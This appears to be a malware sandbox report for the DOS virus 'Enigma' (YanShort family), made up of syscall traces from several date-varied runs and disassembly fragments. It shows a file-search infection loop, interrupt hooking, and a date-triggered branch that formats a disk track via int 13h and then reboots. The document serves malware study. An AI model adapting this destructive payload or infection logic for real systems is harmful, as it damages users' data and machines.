Sample viewer

vx.netlux.org/Virus.DOS.YanShort.Enigma


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:02:55.445968327Z 47 PC: 12a67 | Get disk transfer address
2018-12-17T23:02:55.447506499Z 26 PC: 13002 | Set disk transfer address
2018-12-17T23:02:55.450030764Z 78 PC: 13012 | Find first file
2018-12-17T23:02:55.456543888Z 26 PC: 13002 | Set disk transfer address
2018-12-17T23:02:55.458038509Z 78 PC: 13012 | Find first file
2018-12-17T23:02:55.465580637Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.468391535Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.471280475Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.474160826Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.478321495Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.481324875Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.484228132Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.488454893Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.492100601Z 79 PC: 13029 | Find next file
2018-12-17T23:02:55.49474809Z 42 PC: 12b61 | Get date
0x12b61: pop si
0x12b62: ret
0x12b63: mov si, dx
0x12b65: test byte ptr [si + 0x15], 0x10
0x12b69: jne 0x12b76
0x12b6b: call 0x13016
0x12b6e: jb 0x12b5c
0x12b70: test byte ptr [si + 0x15], 0x10
0x12b74: je 0x12b6b
0x12b76: cmp byte ptr [si + 0x1e], 0x2e
0x12b7a: je 0x12b6b
0x12b7c: call 0x12b98
0x12b7f: push ax
0x12b80: mov ah, 0x1a
0x12b82: int 0x21
0x12b84: pop ax
0x12b85: push si
0x12b86: mov si, 0x77d
0x12b89: sub si, 0x103
0x12b8d: add si, bx
2018-12-17T23:02:55.506980265Z 42 PC: 12aa0 | Get date
0x12aa0: cmp al, 6
0x12aa2: je 0x12aa8
0x12aa4: jne 0x12ab8
0x12aa6: int 0x20
0x12aa8: mov ah, 5
0x12aaa: mov al, 5
0x12aac: mov ch, 0x14
0x12aae: mov cl, 1
0x12ab0: mov dh, 0
0x12ab2: mov dl, 0
0x12ab4: int 0x13
0x12ab6: int 0x19
0x12ab8: mov si, 0xb0b
0x12abb: sub si, 0x103
0x12abf: add si, bx
0x12ac1: mov dx, word ptr [si]
0x12ac3: push ds
0x12ac4: mov ax, word ptr [si + 2]
0x12ac7: mov ds, ax
0x12ac9: push bx
2018-12-17T23:02:55.509180649Z 26 PC: 12acf | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14375,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:24.88625927Z 47 PC: 12a67 | Get disk transfer address
2018-12-25T12:40:24.888520414Z 26 PC: 13002 | Set disk transfer address
2018-12-25T12:40:24.890574219Z 78 PC: 13012 | Find first file
2018-12-25T12:40:24.897874913Z 26 PC: 13002 | Set disk transfer address (See above)
2018-12-25T12:40:24.899542784Z 78 PC: 13012 | Find first file (See above)
2018-12-25T12:40:24.907933395Z 79 PC: 13029 | Find next file
2018-12-25T12:40:24.910966519Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.914242609Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.921181246Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.924349257Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.927626633Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.931449199Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.936022323Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.939238758Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:24.942833604Z 42 PC: 12b61 | Get date
0x12b61: pop si
0x12b62: ret
0x12b63: mov si, dx
0x12b65: test byte ptr [si + 0x15], 0x10
0x12b69: jne 0x12b76
0x12b6b: call 0x13016
0x12b6e: jb 0x12b5c
0x12b70: test byte ptr [si + 0x15], 0x10
0x12b74: je 0x12b6b
0x12b76: cmp byte ptr [si + 0x1e], 0x2e
0x12b7a: je 0x12b6b
0x12b7c: call 0x12b98
0x12b7f: push ax
0x12b80: mov ah, 0x1a
0x12b82: int 0x21
0x12b84: pop ax
0x12b85: push si
0x12b86: mov si, 0x77d
0x12b89: sub si, 0x103
0x12b8d: add si, bx
2018-12-25T12:40:24.946072191Z 42 PC: 12aa0 | Get date
0x12aa0: cmp al, 6
0x12aa2: je 0x12aa8
0x12aa4: jne 0x12ab8
0x12aa6: int 0x20
0x12aa8: mov ah, 5
0x12aaa: mov al, 5
0x12aac: mov ch, 0x14
0x12aae: mov cl, 1
0x12ab0: mov dh, 0
0x12ab2: mov dl, 0
0x12ab4: int 0x13
0x12ab6: int 0x19
0x12ab8: mov si, 0xb0b
0x12abb: sub si, 0x103
0x12abf: add si, bx
0x12ac1: mov dx, word ptr [si]
0x12ac3: push ds
0x12ac4: mov ax, word ptr [si + 2]
0x12ac7: mov ds, ax
0x12ac9: push bx
2018-12-25T12:40:24.949248353Z 26 PC: 12acf | Set disk transfer address

{"DateBased":true,"Day":5,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14375,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:25.251414122Z 47 PC: 12a67 | Get disk transfer address
2018-12-25T12:40:25.253538894Z 26 PC: 13002 | Set disk transfer address
2018-12-25T12:40:25.255388999Z 78 PC: 13012 | Find first file
2018-12-25T12:40:25.263228707Z 26 PC: 13002 | Set disk transfer address (See above)
2018-12-25T12:40:25.264777418Z 78 PC: 13012 | Find first file (See above)
2018-12-25T12:40:25.272341565Z 79 PC: 13029 | Find next file
2018-12-25T12:40:25.275606618Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.27892137Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.283309066Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.286607009Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.289872436Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.294177368Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.297412231Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.300636004Z 79 PC: 13029 | Find next file (See above)
2018-12-25T12:40:25.30403515Z 42 PC: 12b61 | Get date
0x12b61: pop si
0x12b62: ret
0x12b63: mov si, dx
0x12b65: test byte ptr [si + 0x15], 0x10
0x12b69: jne 0x12b76
0x12b6b: call 0x13016
0x12b6e: jb 0x12b5c
0x12b70: test byte ptr [si + 0x15], 0x10
0x12b74: je 0x12b6b
0x12b76: cmp byte ptr [si + 0x1e], 0x2e
0x12b7a: je 0x12b6b
0x12b7c: call 0x12b98
0x12b7f: push ax
0x12b80: mov ah, 0x1a
0x12b82: int 0x21
0x12b84: pop ax
0x12b85: push si
0x12b86: mov si, 0x77d
0x12b89: sub si, 0x103
0x12b8d: add si, bx
2018-12-25T12:40:25.307014923Z 42 PC: 12aa0 | Get date
0x12aa0: cmp al, 6
0x12aa2: je 0x12aa8
0x12aa4: jne 0x12ab8
0x12aa6: int 0x20
0x12aa8: mov ah, 5
0x12aaa: mov al, 5
0x12aac: mov ch, 0x14
0x12aae: mov cl, 1
0x12ab0: mov dh, 0
0x12ab2: mov dl, 0
0x12ab4: int 0x13
0x12ab6: int 0x19
0x12ab8: mov si, 0xb0b
0x12abb: sub si, 0x103
0x12abf: add si, bx
0x12ac1: mov dx, word ptr [si]
0x12ac3: push ds
0x12ac4: mov ax, word ptr [si + 2]
0x12ac7: mov ds, ax
0x12ac9: push bx
2018-12-25T12:40:27.359326565Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:40:27.360910822Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:40:27.363954778Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:40:27.367210465Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:40:27.379622629Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:40:27.386105799Z 62 PC: 91fc1 | Close file
2018-12-25T12:40:27.388425335Z 75 PC: 91fe0 | Execute program
2018-12-25T12:40:27.406507447Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:40:27.408789619Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:40:27.419924067Z 48 PC: c609 | Get DOS version
2018-12-25T12:40:27.423911333Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:40:27.430650577Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:40:27.433546888Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:40:27.437841627Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:40:27.445701709Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:40:27.455548147Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:40:27.468128696Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:40:27.470126451Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:40:27.472555746Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:40:27.502493953Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:40:27.507349713Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:40:27.509380163Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:40:27.511426014Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:40:27.513044224Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:40:27.514893035Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:40:27.516199414Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:40:27.528214853Z 62 PC: 8f8eb | Close file
2018-12-25T12:40:27.53052433Z 62 PC: 8f8f2 | Close file
2018-12-25T12:40:27.532610229Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.534363009Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.536847251Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.538468735Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.540547847Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.543164172Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.544804439Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.546422827Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.549017693Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.550709595Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.552411771Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.554247747Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.557123498Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.558749044Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.560372288Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.562819358Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.564811272Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.566774888Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.570345033Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.572254062Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.574123582Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.576481278Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.578439288Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.59462078Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.597974867Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.599812908Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.601455036Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.605391601Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.607403185Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:40:27.60908914Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:40:27.614493628Z 62 PC: 8f90e | Close file
2018-12-25T12:40:27.617300714Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:40:27.619011114Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:40:27.620781583Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:40:27.626236408Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:40:27.6280967Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:40:27.633766533Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:40:27.637342708Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:40:27.638973658Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:40:27.640902689Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:40:27.643164222Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:40:27.644561768Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:40:27.646243614Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:40:27.648000345Z 73 PC: 8fa11 | Release memory
2018-12-25T12:40:27.649506782Z 73 PC: 8efea | Release memory
2018-12-25T12:40:27.65074388Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:40:27.652306297Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:40:27.654122891Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:40:27.655675439Z 73 PC: 8f060 | Release memory
2018-12-25T12:40:27.657039377Z 61 PC: 8f080 | Open file (Filename = 'r,�S�������[�
2018-12-25T12:40:27.667733088Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:40:27.673936161Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:40:27.675924291Z 62 PC: 8f0d1 | Close file
2018-12-25T12:40:27.67939284Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:40:27.703006626Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:40:27.704339081Z 48 PC: 12bee | Get DOS version
2018-12-25T12:40:27.707634282Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:40:27.710432464Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:40:27.712029223Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:40:27.71487186Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:40:27.716617355Z 72 PC: 1355d | Allocate memory
2018-12-25T12:40:27.718479504Z 25 PC: 13596 | Get default drive
2018-12-25T12:40:27.72051554Z 71 PC: 135ad | Get current directory
2018-12-25T12:40:27.72315711Z 59 PC: 135ba | Change current directory
2018-12-25T12:40:27.729191227Z 59 PC: 135c8 | Change current directory
2018-12-25T12:40:27.737499147Z 59 PC: 135d3 | Change current directory
2018-12-25T12:40:27.741652521Z 25 PC: 12d13 | Get default drive
2018-12-25T12:40:27.742901268Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:40:27.744178495Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:40:27.746256235Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:40:27.749032222Z 80 PC: 1301d | Set current PSP
2018-12-25T12:40:27.750072205Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:40:27.751699994Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:40:27.752911274Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:40:27.754324563Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:40:27.757363376Z 72 PC: 130ec | Allocate memory
2018-12-25T12:40:27.75939159Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:40:27.765971093Z 62 PC: 131ba | Close file
2018-12-25T12:40:27.768919243Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:40:27.769985535Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:40:27.771645641Z 72 PC: 11991 | Allocate memory
2018-12-25T12:40:27.775733774Z 73 PC: 119b2 | Release memory
2018-12-25T12:40:27.777510617Z 72 PC: 119bd | Allocate memory
2018-12-25T12:40:27.779628561Z 73 PC: 119df | Release memory
2018-12-25T12:40:27.78174213Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:40:27.78403113Z 72 PC: 119fd | Allocate memory